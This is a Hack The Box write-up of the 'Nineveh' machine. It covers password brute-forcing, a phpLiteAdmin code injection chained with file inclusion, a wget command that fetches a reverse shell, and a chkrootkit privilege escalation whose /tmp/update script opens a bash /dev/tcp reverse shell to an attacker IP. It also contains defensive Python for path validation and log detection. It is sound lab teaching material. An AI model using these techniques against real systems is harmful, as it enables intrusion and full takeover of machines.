HTB Nineveh Writeup

mansk1es
6 min read · Nov 26, 2020

Nineveh is a medium-rated box built around the phpLiteAdmin 1.9(.3) vulnerability. This vulnerability lets the attacker interact with the box's phpLiteAdmin database over HTTPS, write malicious PHP into a database file, and then execute that PHP by including the created file through a file inclusion bug on the box's non-SSL HTTP site. Let's get right to it.

First and foremost we start with our scan.

We can see that only web ports are open, HTTP and HTTPS. Let's jump right over to the HTTP site.

I can see a domain in the HTTPS port 443 scan report (nineveh.htb), so I’ll add this domain to the /etc/hosts file.

It works!

Entering the IP in the URL lands us on an "It works!" page. Now we're going to run gobuster.

Gobuster — HTTP

I added the php extension because gobuster found an info.php page, so this site clearly serves PHP pages. I added the txt extension to find any hidden .txt files such as robots.txt, secret.txt, etc.

gobuster found the department dir; going there took me to a login page.

Checking the page source I found this comment:

<!-- @admin! MySQL is been installed.. please fix the login page! ~amrois -->

Okay, looks like we have 2 usernames: admin and amrois. Trying to log in as amrois tells me the username is not valid, while trying admin with an incorrect password tells me only the password is wrong. So on this login page I'm going to attack the admin account, since the application confirms it is a valid username.

I tried several SQL injection payloads on the login prompt, but it is not vulnerable to SQL injection. The MySQL mention in the comment is probably a rabbit hole pointing towards SQL injection.

I ran hydra to brute-force the admin user's password and got valid credentials for admin!

We got login creds = admin : 1a2w3e4r5t .

Logging in we see this page :

Under Construction ;)

Opening the 'Notes' tab reveals a file inclusion parameter in the URL:

http://10.10.10.43/department/manage.php?notes=files/ninevehNotes.txt

We can assume there's a "files" folder in the script's current working directory, and that the page reads the 'ninevehNotes.txt' file inside of it. We try to include '../../../../../etc/passwd', but that doesn't work.
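The notes parameter above is a classic local file inclusion sink. As an added example (not code from the box or from the original post), here is how the server side should validate such a parameter: normalise the requested path lexically, reject anything absolute or climbing out of the notes directory, and only allow the expected extension. The directory name `files` and the `.txt` restriction are assumptions taken from the URL in the writeup.

```python
import posixpath
from typing import Optional

# Assumed layout (from the URL in the writeup): notes live under "files/" and are .txt.
NOTES_ROOT = "files"
ALLOWED_SUFFIX = ".txt"


def resolve_note(requested: str) -> Optional[str]:
    """Return a safe relative path for `requested`, or None if it must be rejected.

    The check is purely lexical (no filesystem access), so it can run before any
    include/open call and is independent of what actually exists on disk.
    """
    if not requested or "\x00" in requested:
        return None

    # Collapse "." and ".." components: "files/../../etc/passwd" -> "../etc/passwd".
    norm = posixpath.normpath(requested)

    # Absolute paths and anything that climbs out of the working directory are rejected.
    if norm.startswith("/") or norm == ".." or norm.startswith("../"):
        return None

    # Only files directly under the notes directory are allowed.
    if not norm.startswith(NOTES_ROOT + "/"):
        return None

    # Only plain text notes may be included, never .php or other executable content.
    if not norm.endswith(ALLOWED_SUFFIX):
        return None

    return norm


if __name__ == "__main__":
    for candidate in [
        "files/ninevehNotes.txt",
        "files/./ninevehNotes.txt",
        "../../../../../etc/passwd",
        "files/../../etc/passwd",
        "/var/tmp/ninevehNotes.php",
        "files/ninevehNotes.php",
    ]:
        print(f"{candidate!r:40} -> {resolve_note(candidate)}")
```

The normalisation step matters: a check that only looks for a literal `../` prefix would accept `files/../../etc/passwd`, while `posixpath.normpath` reduces it to `../etc/passwd` and the prefix check then rejects it.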

Entering the SSL site shows us an image. I tried steganography techniques on the downloaded image, but there's nothing special there; it's just an image.

Running a gobuster on the SSL page found an interesting dir.

Going to https://10.10.10.43/db/ brings us to a phpLiteAdmin v1.9 authentication page.

I decided to use hydra on this page as well.

Hydra found a password! (Pretty basic, I could've guessed it.) We now have a password for this page as well: 'password123'

phpLiteAdmin index

At this point I start exploiting the vulnerable version of phpLiteAdmin with https://www.exploit-db.com/exploits/24044, which is a remote PHP code injection.

I created a database named 'ninevehNotes.php' and added a table whose value is a PHP code-execution payload.

The index page shows the path to the database: /var/tmp/*database*. We include that path on the HTTP site to gain command execution through the '&cmd=' parameter.

Using cmd=id shows us the output of the command uid=33(www-data) gid=33(www-data) groups=33(www-data)

I can see I successfully executed ‘id’ !
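Everything from the traversal attempt in the Notes tab to the command execution above leaves a clear trail in the web server's access log. As an added example (not from the original post and not the box's own tooling), here is detection logic run over a few constructed Apache combined-format log lines: it flags `../` in any parameter, absolute paths and non-.txt values in the `notes` parameter, and the presence of a `cmd` parameter on the include endpoint. The log lines, IPs and timestamps are constructed for the example.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log lines (Apache combined format); not taken from the box.
SAMPLE_LOG = """\
10.10.14.5 - - [26/Nov/2020:10:01:02 +0000] "GET /department/manage.php?notes=files/ninevehNotes.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.5 - - [26/Nov/2020:10:01:09 +0000] "GET /department/manage.php?notes=../../../../../etc/passwd HTTP/1.1" 200 120 "-" "Mozilla/5.0"
10.10.14.5 - - [26/Nov/2020:10:03:40 +0000] "GET /department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=id HTTP/1.1" 200 230 "-" "Mozilla/5.0"
10.10.14.9 - - [26/Nov/2020:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 11321 "-" "curl/7.72"
"""

# Minimal parser for the parts of a combined-format line we need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def analyse_request(target: str) -> List[str]:
    """Return the list of reasons a request target looks like LFI/RCE abuse (empty if clean)."""
    reasons: List[str] = []
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)

    for name, values in params.items():
        for raw in values:
            # parse_qs already decodes once; decoding again catches double-encoded "../".
            value = unquote(raw)
            if "../" in value or "..\\" in value:
                reasons.append(f"traversal in {name}")
            if name == "notes":
                if value.startswith("/"):
                    reasons.append("absolute path in notes")
                if not value.lower().endswith(".txt"):
                    reasons.append("non-txt include in notes")

    if "cmd" in params:
        reasons.append("cmd parameter on include endpoint")
    return reasons


def scan_log(text: str) -> List[Dict[str, object]]:
    """Parse each log line and collect the requests that trigger at least one reason."""
    hits: List[Dict[str, object]] = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # skip lines that are not in the expected format
        reasons = analyse_request(match.group("target"))
        if reasons:
            hits.append({
                "ip": match.group("ip"),
                "time": match.group("ts"),
                "target": match.group("target"),
                "reasons": reasons,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} {hit['target']}")
        for reason in hit["reasons"]:
            print(f"    - {reason}")
```

The legitimate request for `files/ninevehNotes.txt` produces no reasons, so alerting on any non-empty result gives a low-noise rule for this endpoint; on a real deployment the same checks would be applied to the decoded query string of every request to the include script rather than to a fixed sample.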

Now I fetch a reverse shell from my local machine onto the box and save it as ninevehNotes.php, replacing the command injection payload with an actual shell. The command is passed URL-encoded through the cmd parameter, and wget needs the capital -O so that the downloaded file (not its log) is written to the given path:

wget+ip:port/file+-O+/var/tmp/fileoutput

And we have a shell!

After getting a shell, I looked through the 'ssl' directory inside /var/www and found an interesting directory: secure_notes inside /var/www/ssl. I tried opening it in the browser.

Entering https://10.10.10.43/secure_notes shows us another image. Applying steganography techniques yet again, I found an SSH key embedded in it using 'strings'!

Beautiful. We copy it into a file named "id_rsa" and run it through john to see whether it has a passphrase we would need to crack.

Perfect! John tells us there's no passphrase on this id_rsa, meaning we can use it to log in as the user it belongs to! But... SSH isn't open.. (yet)

I switched to amrois using this id_rsa INSIDE the box.

We head over to /var/mail to see if someone has got any mail we can read and amrois does have mail! A very interesting one.

Ah! A reference to port knocking! Let’s try to open SSH with the “knock” command on our Kali machine!

We successfully opened port 22! We can now have a more stable direct SSH connection to amrois.

Privilege Escalation

Running pspy32 shows us that root runs chkrootkit a LOT.

I try the chkrootkit version 0.49 privilege escalation exploit by creating a file named 'update' in the /tmp directory. If this is the vulnerable version of chkrootkit, it executes /tmp/update as root (root runs it, as I've mentioned before)!

So I create a file named ‘update’ in the /tmp directory with the following:

#!/bin/bash

bash -c 'bash -i >& /dev/tcp/10.10.14.**/51337 0>&1'

And I run a netcat listener on my Kali machine listening on port 51337.

And we're root! An interesting and educational box; I've enjoyed it.
